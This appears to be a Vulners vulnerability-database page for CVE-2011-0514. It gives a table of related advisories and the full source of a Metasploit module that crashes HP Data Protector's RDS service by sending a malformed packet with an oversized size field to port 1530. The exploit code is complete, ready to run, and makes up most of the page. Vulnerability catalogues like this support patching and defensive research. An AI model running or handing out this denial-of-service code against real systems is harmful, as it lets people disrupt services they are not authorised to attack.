| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2011-0514 | 8 Jan 201100:00 | – | circl | |
| CVE-2011-0514 | 20 Jan 201118:00 | – | cve | |
| CVE-2011-0514 | 20 Jan 201118:00 | – | cvelist | |
| HP Data Protector Manager RDS DOS | 8 Apr 201107:56 | – | metasploit | |
| CVE-2011-0514 | 20 Jan 201119:00 | – | nvd | |
| HP (OpenView Storage) Data Protector Manager DoS Vulnerability | 27 Jan 201100:00 | – | openvas | |
| Beckhoff TwinCAT 'TCATSysSrv.exe' Network Packet Denial of Service Vulnerability | 22 Sep 201100:00 | – | openvas | |
| HP (OpenView Storage) Data Protector Manager RDS Service DoS Vulnerability | 24 Jun 201100:00 | – | openvas | |
| Code injection | 20 Jan 201119:00 | – | prion | |
| CVE-2011-0514 | 9 Jan 202610:03 | – | redhatcve |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Manager RDS DOS',
'Description' => %q{
This module causes a remote DOS on HP Data Protector's RDS service. By sending
a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous
size for malloc().
},
'Author' =>
[
'Roi Mallo <rmallof[at]gmail.com>', #initial discovery, poc
'sinn3r', #msf
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-0514' ],
[ 'OSVDB', '70617' ],
[ 'EDB', '15940' ],
],
'DisclosureDate' => '2011-01-08' ))
register_options([
Opt::RPORT(1530),
])
end
def run
buf = "\x23\x8c\x29\xb6" #Header
buf << "\x64\x00\x00\x00" #Packet size
buf << "\x41"*4 #Data
connect
print_status("Sending malformed packet...")
sock.put(buf)
disconnect
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation